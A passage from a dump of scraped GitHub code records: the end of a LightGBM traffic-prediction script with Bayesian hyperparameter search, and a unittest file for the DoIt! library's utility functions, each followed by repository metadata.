#'motorbike2_mean',\r\n #'bicycle1_mean',\r\n #'bicycle2_mean',\r\n \"gap_mean\",\r\n \"gap_std\",\r\n \"hour_mean\",\r\n \"minute_mean\",\r\n \"dayofweek_mean\",\r\n \"gap_time_today_mean\",\r\n \"gap_time_today_std\",\r\n '1','2','3',\r\n #\"im_diff_mean_mean\",\"im_diff_mean_std\",\"im_diff_std_mean\",\"im_diff_std_std\",\r\n ]\r\n\r\ntrain_features['number1'] = train_features['car1'] + train_features['truck1'] + train_features['bus1'] + train_features['motorbike1'] + train_features['bicycle1']\r\ntrain_features['number2'] = train_features['car2'] + train_features['truck2'] + train_features['bus2'] + train_features['motorbike2'] + train_features['bicycle2']\r\ntest_features['number1'] = test_features['car1'] + test_features['truck1'] + test_features['bus1'] + test_features['motorbike1'] + test_features['bicycle1']\r\ntest_features['number2'] = test_features['car2'] + test_features['truck2'] + test_features['bus2'] + test_features['motorbike2'] + test_features['bicycle2']\r\n\r\ntrain_features['square'] = train_features['rate1'] + train_features['rate2']\r\ntest_features['square'] = test_features['rate1'] + test_features['rate2']\r\ntrain_features['number'] = train_features['number1'] + train_features['number2']\r\ntest_features['number'] = test_features['number1'] + test_features['number2']\r\n\r\ntrain_features = train_features.groupby(\"map_id1\").agg({\r\n \"rate1\":[\"mean\",\"std\"],\r\n \"rate2\":[\"mean\",\"std\"],\r\n \"number1\":[\"mean\",\"std\"],\r\n \"number2\":[\"mean\",\"std\"],\r\n \"square\":[\"mean\",\"std\"],\r\n 'number':['mean','std'],\r\n 'car1':['mean'],'car2':['mean'],'truck1':['mean'],'truck2':['mean'],'bus1':['mean'],'bus2':['mean'],'motorbike1':['mean'],'motorbike2':['mean'],'bicycle1':['mean'],'bicycle2':['mean'],\r\n \"label\":[\"mean\"],\r\n }).reset_index()\r\n\r\ntest_features = test_features.groupby(\"map_id1\").agg({\r\n \"rate1\":[\"mean\",\"std\"],\r\n \"rate2\":[\"mean\",\"std\"],\r\n \"number1\":[\"mean\",\"std\"],\r\n \"number2\":[\"mean\",\"std\"],\r\n \"square\":[\"mean\",\"std\"],\r\n 'number':['mean','std'],\r\n 'car1':['mean'],'car2':['mean'],'truck1':['mean'],'truck2':['mean'],'bus1':['mean'],'bus2':['mean'],'motorbike1':['mean'],'motorbike2':['mean'],'bicycle1':['mean'],'bicycle2':['mean'],\r\n \"label\":[\"mean\"],\r\n }).reset_index()\r\ntrain_features.columns = [\r\n \"map_id1\",\r\n \"rate1_mean\",\"rate1_std\",\"rate2_mean\",\"rate2_std\",\r\n \"number1_mean\",\"number1_std\",\"number2_mean\",\"number2_std\",\r\n 'square_mean', 'square_std',\r\n 'number_mean', 'number_std',\r\n 'car1_mean','car2_mean','truck1_mean','truck2_mean','bus1_mean','bus2_mean','motorbike1_mean','motorbike2_mean','bicycle1_mean','bicycle2_mean',\r\n #'1','2','3','4','5','6','7','8','9','10','11',\r\n \"label\"]\r\ntest_features.columns = [\r\n \"map_id1\",\r\n \"rate1_mean\",\"rate1_std\",\"rate2_mean\",\"rate2_std\",\r\n \"number1_mean\",\"number1_std\",\"number2_mean\",\"number2_std\",\r\n 'square_mean', 'square_std',\r\n 'number_mean', 'number_std',\r\n 'car1_mean','car2_mean','truck1_mean','truck2_mean','bus1_mean','bus2_mean','motorbike1_mean','motorbike2_mean','bicycle1_mean','bicycle2_mean',\r\n \"label\"]\r\n'''\r\ntrain_df = get_data(train_json[:],\"amap_traffic_train_0712\")\r\ntest_df = get_data(test_json[:],\"amap_traffic_test_0712\")\r\ntest_df.to_csv(path_or_buf = path + 'test_feature_timecn_new.csv')\r\ntrain_df.to_csv(path_or_buf = path + 'train_feature_timecn_new.csv')\r\n'''\r\n\r\ntrain_features = pd.concat([train_features, train_df, X], axis = 
1)\r\ntest_features = pd.concat([test_features, test_df, X_test], axis = 1)\r\n\r\ntrain_features[\"label\"] = train_features[\"label\"].apply(int)\r\ntest_features[\"label\"] = test_features[\"label\"].apply(int)\r\n\r\n\r\ntrain_x = train_features[select_features].copy()\r\ntrain_y = train_features[\"label\"]\r\ntest_x = test_features[select_features].copy()\r\n\r\n\"\"\" ====================== Random Search ========================== \"\"\"\r\nbounds = {\r\n 'min_child_weight': (1,10),\r\n 'num_leaves': (8, 150),\r\n 'lambda_l2': (0, 50),\r\n #'lambda_l1': (0, 50),\r\n 'feature_fraction': (0.2, 1),\r\n 'bagging_fraction': (0.2, 1),\r\n 'bagging_freq': (1, 100),\r\n 'learning_rate': (0.01, 1),\r\n 'min_data_in_leaf': (1,20),\r\n 'max_depth': (3, 30),\r\n 'min_split_gain': (0, 50),\r\n \r\n }\r\nlgb_bo = BayesianOptimization(lgb_cv, bounds, random_state = 1111)\r\n\r\nlgb_bo.maximize(init_points = 10, n_iter = 100)\r\nbest = lgb_bo.max\r\na = 0", "repo_name": "liuzexi256/GaodeMAP", "sub_path": "BayesOpt.py", "file_name": "BayesOpt.py", "file_ext": "py", "file_size_in_byte": 12329, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "bayes_opt.BayesianOptimization", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "lightgbm.Dataset", "line_number": 71, "usage_type": "call"}, {"api_name": "lightgbm.Dataset", "line_number": 72, "usage_type": "call"}, {"api_name": "lightgbm.train", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 95, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 124, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 128, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 129, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 130, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 131, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 224, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 225, "usage_type": "call"}, {"api_name": "bayes_opt.BayesianOptimization", "line_number": 250, "usage_type": "call"}]} +{"seq_id": "9987164383", "text": "# -*- coding: utf-8 -*-\n#! \\file ./tests/test_support/test_utils.py\n#! \\author Jiří Kučera, \n#! \\stamp 2014-04-10 20:58:24 (UTC+01:00, DST+01:00)\n#! \\project DoIt!: Tools and Libraries for Building DSLs\n#! \\license MIT\n#! \\version 0.0.0\n#! \\fdesc @pyfile.docstr\n#\n\"\"\"\\\nDoIt! 
utilities tests.\\\n\"\"\"\n\n__license__ = \"\"\"\\\nCopyright (c) 2014 - 2017 Jiří Kučera.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\\\n\"\"\"\n\nimport time\nimport unittest\n\nfrom ..common import RAISE_FROM_ENTER, SUPRESS, ContextManagerMock, \\\n ModuleContext\n\nfrom doit.support.errors import DoItAssertionError\n\nfrom doit.support.utils import \\\n ordinal_suffix, deep_eq, timestamp, \\\n Functor, WithStatementExceptionHandler, Collection\n\nclass Struct(object):\n __slots__ = [ '__kwargs' ]\n\n def __init__(self, **kwargs):\n cls = object.__getattribute__(self, '__class__')\n clsname = cls.__name__\n _ = lambda x: x.startswith('__') and '_%s%s' % (clsname, x) or x\n setattr(self, _('__kwargs'), kwargs)\n #-def\n\n def __getattr__(self, value):\n cls = object.__getattribute__(self, '__class__')\n clsname = cls.__name__\n _ = lambda x: x.startswith('__') and '_%s%s' % (clsname, x) or x\n kwargs = object.__getattribute__(self, _('__kwargs'))\n if value in kwargs:\n return kwargs[value]\n object.__getattribute__(self, value)\n #-def\n#-class\n\nclass TimeModuleMock(ModuleContext):\n __slots__ = [\n '__old_localtime',\n '__old_timezone'\n ]\n\n def __init__(self, env):\n ModuleContext.__init__(self, env)\n self.__old_localtime = time.localtime\n self.__old_timezone = time.timezone\n #-def\n\n def replace(self, env):\n def _localtime():\n return Struct(\n tm_year = env['year'],\n tm_mon = env['month'],\n tm_mday = env['day'],\n tm_hour = env['hour'],\n tm_min = env['min'],\n tm_sec = env['sec'],\n tm_isdst = env['isdst']\n )\n self.__old_localtime = time.localtime\n self.__old_timezone = time.timezone\n time.localtime = _localtime\n time.timezone = env['tz']\n #-def\n\n def restore(self):\n time.localtime = self.__old_localtime\n time.timezone = self.__old_timezone\n #-def\n#-class\n\nclass FunctorA(Functor):\n __slots__ = []\n\n def __init__(self, a, b, c = 3):\n Functor.__init__(self, a, b, c = c)\n #-def\n#-class\n\nclass FunctorB(Functor):\n __slots__ = []\n\n def __init__(self, a, b, c = 3):\n Functor.__init__(self, a, b, c = c)\n #-def\n#-class\n\nclass TestOrdinalSuffixCase(unittest.TestCase):\n\n def test_ordinal_suffix(self):\n cases = [\n (0, 'th'),\n (1, 'st'),\n (2, 'nd'),\n (3, 'rd'),\n (4, 'th'),\n (5, 'th'),\n (10, 'th'),\n (11, 'th'),\n (12, 'th'),\n (13, 'th'),\n (14, 'th'),\n (15, 'th'),\n (20, 'th'),\n (21, 'st'),\n (22, 'nd'),\n (23, 'rd'),\n (24, 'th'),\n (25, 'th'),\n (30, 'th'),\n (31, 'st'),\n (32, 'nd'),\n (33, 'rd'),\n (34, 'th'),\n (35, 'th'),\n (50, 'th'),\n (51, 'st'),\n 
(52, 'nd'),\n (53, 'rd'),\n (54, 'th'),\n (55, 'th'),\n (90, 'th'),\n (91, 'st'),\n (92, 'nd'),\n (93, 'rd'),\n (94, 'th'),\n (95, 'th')\n ]\n bases = [0, 100, 1000, 10000, 1000000]\n\n for b in bases:\n for c in cases:\n self.assertEqual(ordinal_suffix(b + c[0]), c[1])\n self.assertEqual(ordinal_suffix(-(b + c[0])), c[1])\n #-def\n#-class\n\nclass TestDeepEqCase(unittest.TestCase):\n\n def test_deep_eq(self):\n x1 = lambda x: x\n\n self.assertTrue(x1, x1)\n\n self.assertTrue(deep_eq([], []))\n self.assertTrue(deep_eq([], ()))\n self.assertTrue(deep_eq((), []))\n self.assertTrue(deep_eq((), ()))\n\n self.assertFalse(deep_eq({}, ()))\n self.assertFalse(deep_eq([], {}))\n self.assertTrue(deep_eq({}, {}))\n\n self.assertTrue(deep_eq([[]], [()]))\n self.assertFalse(deep_eq([], [()]))\n\n self.assertTrue(deep_eq([[1, 2], [3]], [(1, 2), (3,)]))\n self.assertTrue(deep_eq([[1, 2], [3, (4, 5)]], [(1, 2), (3, [4, 5])]))\n self.assertFalse(deep_eq(\n [[1, 2], [3, (4, 5)]],\n [(1, 2), (3, [4, [5]])]\n ))\n\n self.assertTrue(deep_eq({'a': 1, 2: 0}, {2: 0, 'a': 1}))\n self.assertFalse(deep_eq({'a': 1, 2: 0}, {2: 0, 'a': 0}))\n self.assertFalse(deep_eq({'a': 1, 2: 0}, {2: 0, 'x': 1}))\n self.assertFalse(deep_eq({'a': 1, 2: 0}, {2: 0, 'a': 1, 1: 1}))\n self.assertTrue(deep_eq(\n {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3,)})}]},\n {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3,)})}]}\n ))\n self.assertFalse(deep_eq(\n {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3,)})}]},\n {'a': 1, 'b': [1, {'c': 'x', 'd': (1, 2, {1: (3, 4)})}]}\n ))\n\n self.assertTrue(deep_eq(1, 1))\n self.assertFalse(deep_eq(1, 2))\n #-def\n#-class\n\nclass TestTimeStampCase(unittest.TestCase):\n\n def test_dst(self):\n env = dict(\n year = 2008, month = 7, day = 11,\n hour = 13, min = 15, sec = 34,\n isdst = 1, tz = -5378\n )\n with TimeModuleMock(env):\n t = timestamp()\n self.assertEqual(t['year'], 2008)\n self.assertEqual(t['month'], 7)\n self.assertEqual(t['day'], 11)\n self.assertEqual(t['hour'], 13)\n self.assertEqual(t['min'], 15)\n self.assertEqual(t['sec'], 34)\n self.assertEqual(t['utcsign'], '+')\n self.assertEqual(t['utchour'], 1)\n self.assertEqual(t['utcmin'], 29)\n self.assertEqual(t['utcsec'], 38)\n self.assertEqual(t['dsthour'], 1)\n self.assertEqual(t['dstmin'], 0)\n self.assertEqual(t['dstsec'], 0)\n #-def\n\n def test_nodst(self):\n env = dict(\n year = 2008, month = 11, day = 11,\n hour = 13, min = 15, sec = 34,\n isdst = 0, tz = 5378\n )\n with TimeModuleMock(env):\n t = timestamp()\n self.assertEqual(t['year'], 2008)\n self.assertEqual(t['month'], 11)\n self.assertEqual(t['day'], 11)\n self.assertEqual(t['hour'], 13)\n self.assertEqual(t['min'], 15)\n self.assertEqual(t['sec'], 34)\n self.assertEqual(t['utcsign'], '-')\n self.assertEqual(t['utchour'], 1)\n self.assertEqual(t['utcmin'], 29)\n self.assertEqual(t['utcsec'], 38)\n self.assertEqual(t['dsthour'], 0)\n self.assertEqual(t['dstmin'], 0)\n self.assertEqual(t['dstsec'], 0)\n #-def\n\n def test_dst_not_avail(self):\n env = dict(\n year = 2008, month = 7, day = 11,\n hour = 13, min = 15, sec = 34,\n isdst = -1, tz = 14400\n )\n with TimeModuleMock(env):\n t = timestamp()\n self.assertEqual(t['year'], 2008)\n self.assertEqual(t['month'], 7)\n self.assertEqual(t['day'], 11)\n self.assertEqual(t['hour'], 13)\n self.assertEqual(t['min'], 15)\n self.assertEqual(t['sec'], 34)\n self.assertEqual(t['utcsign'], '-')\n self.assertEqual(t['utchour'], 4)\n self.assertEqual(t['utcmin'], 0)\n self.assertEqual(t['utcsec'], 0)\n self.assertEqual(t['dsthour'], 0)\n 
self.assertEqual(t['dstmin'], 0)\n self.assertEqual(t['dstsec'], 0)\n #-def\n#-class\n\nclass TestFunctorCase(unittest.TestCase):\n\n def test_equality(self):\n f1 = FunctorA(1, 2, c = 4)\n f2 = FunctorB(1, 2, c = 4)\n f3 = FunctorA(1, 2, 4)\n\n self.assertNotEqual(f1, f2)\n self.assertEqual(f1, f3)\n #-def\n#-class\n\nclass TestWithStatementExceptionHandlerCase(unittest.TestCase):\n\n def test_what_happen_when_exception_is_not_raised(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(0)\n\n with wseh, ctxmock:\n pass\n\n self.assertIsNone(wseh.etype)\n self.assertIsNone(wseh.evalue)\n self.assertIsNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_raised_from_enter(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(RAISE_FROM_ENTER)\n\n with wseh, ctxmock:\n pass\n\n self.assertIsNotNone(wseh.etype)\n self.assertIsNotNone(wseh.evalue)\n self.assertIsNotNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_raised_within_block(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(0)\n\n with wseh, ctxmock:\n raise Exception()\n\n self.assertIsNotNone(wseh.etype)\n self.assertIsNotNone(wseh.evalue)\n self.assertIsNotNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_not_raised_and_supressed(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(SUPRESS)\n\n with wseh, ctxmock:\n pass\n\n self.assertIsNone(wseh.etype)\n self.assertIsNone(wseh.evalue)\n self.assertIsNone(wseh.etraceback)\n #-def\n\n def test_what_happen_when_exception_is_raised_and_supressed(self):\n wseh = WithStatementExceptionHandler()\n ctxmock = ContextManagerMock(SUPRESS)\n\n with wseh, ctxmock:\n raise Exception()\n\n self.assertIsNone(wseh.etype)\n self.assertIsNone(wseh.evalue)\n self.assertIsNone(wseh.etraceback)\n #-def\n#-class\n\nclass TestCollectionCase(unittest.TestCase):\n\n def test_create_unique_objects(self):\n a = Collection('MyColl1')\n\n self.assertEqual(a.name, 'MyColl1')\n self.assertEqual(a.qname, 'MyColl1')\n\n b = Collection('MyColl1')\n\n self.assertEqual(b.name, 'MyColl1')\n self.assertEqual(b.qname, 'MyColl1')\n\n c = Collection('MyColl2')\n\n self.assertEqual(c.name, 'MyColl2')\n self.assertEqual(c.qname, 'MyColl2')\n\n d = Collection()\n e = Collection()\n\n self.assertIs(a, b)\n self.assertEqual(a.name, b.name)\n self.assertEqual(a.qname, b.qname)\n self.assertIsNot(a, c)\n self.assertNotEqual(a.name, c.name)\n self.assertNotEqual(a.qname, c.qname)\n self.assertIsNot(d, e)\n self.assertNotEqual(d.name, e.name)\n self.assertNotEqual(d.qname, e.qname)\n #-def\n\n def test_create_subobjects(self):\n Fruit = Collection('Fruit')\n\n self.assertEqual(Fruit.name, 'Fruit')\n self.assertEqual(Fruit.qname, 'Fruit')\n\n Apple = Fruit.Apple\n\n self.assertEqual(Apple.name, 'Apple')\n self.assertEqual(Apple.qname, 'Fruit.Apple')\n\n Orange = Fruit.Orange\n\n self.assertEqual(Orange.name, 'Orange')\n self.assertEqual(Orange.qname, 'Fruit.Orange')\n\n Banana = Fruit.Banana\n\n self.assertEqual(Banana.name, 'Banana')\n self.assertEqual(Banana.qname, 'Fruit.Banana')\n\n Vegetable = Collection('Vegetable')\n\n self.assertEqual(Vegetable.name, 'Vegetable')\n self.assertEqual(Vegetable.qname, 'Vegetable')\n\n Carrot = Vegetable.Carrot\n\n self.assertEqual(Carrot.name, 'Carrot')\n self.assertEqual(Carrot.qname, 'Vegetable.Carrot')\n\n Potato = Vegetable.Potato\n\n self.assertEqual(Potato.name, 'Potato')\n self.assertEqual(Potato.qname, 
'Vegetable.Potato')\n\n Tomato = Vegetable.Tomato\n\n self.assertEqual(Tomato.name, 'Tomato')\n self.assertEqual(Tomato.qname, 'Vegetable.Tomato')\n\n Dairy = Collection('Dairy')\n\n self.assertEqual(Dairy.name, 'Dairy')\n self.assertEqual(Dairy.qname, 'Dairy')\n\n Cheese = Dairy.Cheese\n\n self.assertEqual(Cheese.name, 'Cheese')\n self.assertEqual(Cheese.qname, 'Dairy.Cheese')\n\n Chedar = Cheese.Chedar\n\n self.assertEqual(Chedar.name, 'Chedar')\n self.assertEqual(Chedar.qname, 'Dairy.Cheese.Chedar')\n\n ProceededChedar = Chedar.Proceeded\n\n self.assertEqual(ProceededChedar.name, 'Proceeded')\n self.assertEqual(\n ProceededChedar.qname, 'Dairy.Cheese.Chedar.Proceeded'\n )\n\n Ementaler = Cheese.Ementaler\n\n self.assertEqual(Ementaler.name, 'Ementaler')\n self.assertEqual(Ementaler.qname, 'Dairy.Cheese.Ementaler')\n\n Food = Collection(\n 'Food', 'Fruit', 'Vegetable', 'Dairy.Cheese.Chedar', 'Dairy.Cheese'\n )\n\n self.assertEqual(Food.name, 'Food')\n self.assertEqual(Food.qname, 'Food')\n self.assertIs(Apple, Food.Apple)\n self.assertIs(Orange, Food.Orange)\n self.assertIs(Banana, Food.Banana)\n self.assertIs(Carrot, Food.Carrot)\n self.assertIs(Potato, Food.Potato)\n self.assertIs(Tomato, Food.Tomato)\n self.assertIs(Chedar, Food.Chedar)\n self.assertIs(ProceededChedar, Food.Proceeded)\n self.assertIs(Food.Chedar.Proceeded, Food.Proceeded)\n self.assertIs(Ementaler, Food.Ementaler)\n #-def\n\n def test_contains_operator(self):\n A = Collection(\"A\")\n B = Collection(\"@\")\n\n self.assertNotIn(A, B)\n self.assertNotIn(B, A)\n self.assertIn(A, A)\n self.assertIn(B, B)\n self.assertIn(A.B, A)\n self.assertNotIn(A.B, A.C)\n self.assertIn(B.C.D.S, B.C)\n self.assertNotIn(B, B.A)\n self.assertNotIn(A.BCEF.G, A.BCE)\n self.assertIn(A.BCE.G, A.BCE)\n #-def\n\n def test_lock(self):\n with self.assertRaises(DoItAssertionError):\n Collection.lock()\n T = Collection(\"T\")\n with self.assertRaises(DoItAssertionError):\n Collection.unlock()\n T = Collection(\"T\")\n Collection.lock()\n t = T.Test\n #-def\n\n def test_unlock(self):\n Collection.lock()\n Collection.unlock()\n Test = Collection(\"Test\")\n t = Test.Test1\n #-def\n\n def tearDown(self):\n Collection.unlock()\n #-def\n#-class\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestOrdinalSuffixCase))\n suite.addTest(unittest.makeSuite(TestDeepEqCase))\n suite.addTest(unittest.makeSuite(TestTimeStampCase))\n suite.addTest(unittest.makeSuite(TestFunctorCase))\n suite.addTest(unittest.makeSuite(TestWithStatementExceptionHandlerCase))\n suite.addTest(unittest.makeSuite(TestCollectionCase))\n return suite\n#-def\n", "repo_name": "i386x/doit", "sub_path": "tests/test_support/test_utils.py", "file_name": "test_utils.py", "file_ext": "py", "file_size_in_byte": 15829, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "common.ModuleContext", "line_number": 69, "usage_type": "name"}, {"api_name": "common.ModuleContext.__init__", "line_number": 76, "usage_type": "call"}, {"api_name": "common.ModuleContext", "line_number": 76, "usage_type": "name"}, {"api_name": "time.localtime", "line_number": 77, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 78, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 92, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 93, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 94, "usage_type": "attribute"}, 
{"api_name": "time.timezone", "line_number": 95, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 99, "usage_type": "attribute"}, {"api_name": "time.timezone", "line_number": 100, "usage_type": "attribute"}, {"api_name": "doit.support.utils.Functor", "line_number": 104, "usage_type": "name"}, {"api_name": "doit.support.utils.Functor.__init__", "line_number": 108, "usage_type": "call"}, {"api_name": "doit.support.utils.Functor", "line_number": 108, "usage_type": "name"}, {"api_name": "doit.support.utils.Functor", "line_number": 112, "usage_type": "name"}, {"api_name": "doit.support.utils.Functor.__init__", "line_number": 116, "usage_type": "call"}, {"api_name": "doit.support.utils.Functor", "line_number": 116, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 120, "usage_type": "attribute"}, {"api_name": "doit.support.utils.ordinal_suffix", "line_number": 165, "usage_type": "call"}, {"api_name": "doit.support.utils.ordinal_suffix", "line_number": 166, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 170, "usage_type": "attribute"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 177, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 178, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 179, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 180, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 182, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 183, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 184, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 186, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 187, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 189, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 190, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 191, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 196, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 197, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 198, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 199, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 200, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 204, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 209, "usage_type": "call"}, {"api_name": "doit.support.utils.deep_eq", "line_number": 210, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 214, "usage_type": "attribute"}, {"api_name": "doit.support.utils.timestamp", "line_number": 223, "usage_type": "call"}, {"api_name": "doit.support.utils.timestamp", "line_number": 246, "usage_type": "call"}, {"api_name": "doit.support.utils.timestamp", "line_number": 269, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 286, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 298, "usage_type": "attribute"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 301, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 302, "usage_type": "call"}, {"api_name": 
"doit.support.utils.WithStatementExceptionHandler", "line_number": 313, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 314, "usage_type": "call"}, {"api_name": "common.RAISE_FROM_ENTER", "line_number": 314, "usage_type": "argument"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 325, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 326, "usage_type": "call"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 337, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 338, "usage_type": "call"}, {"api_name": "common.SUPRESS", "line_number": 338, "usage_type": "argument"}, {"api_name": "doit.support.utils.WithStatementExceptionHandler", "line_number": 349, "usage_type": "call"}, {"api_name": "common.ContextManagerMock", "line_number": 350, "usage_type": "call"}, {"api_name": "common.SUPRESS", "line_number": 350, "usage_type": "argument"}, {"api_name": "unittest.TestCase", "line_number": 361, "usage_type": "attribute"}, {"api_name": "doit.support.utils.Collection", "line_number": 364, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 369, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 374, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 379, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 380, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 394, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 414, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 434, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 461, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 480, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 481, "usage_type": "call"}, {"api_name": "doit.support.errors.DoItAssertionError", "line_number": 496, "usage_type": "argument"}, {"api_name": "doit.support.utils.Collection.lock", "line_number": 497, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 497, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection", "line_number": 498, "usage_type": "call"}, {"api_name": "doit.support.errors.DoItAssertionError", "line_number": 499, "usage_type": "argument"}, {"api_name": "doit.support.utils.Collection.unlock", "line_number": 500, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 500, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection", "line_number": 501, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection.lock", "line_number": 502, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 502, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection.lock", "line_number": 507, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 507, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection.unlock", "line_number": 508, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection", "line_number": 508, "usage_type": "name"}, {"api_name": "doit.support.utils.Collection", "line_number": 509, "usage_type": "call"}, {"api_name": "doit.support.utils.Collection.unlock", "line_number": 514, "usage_type": "call"}, 
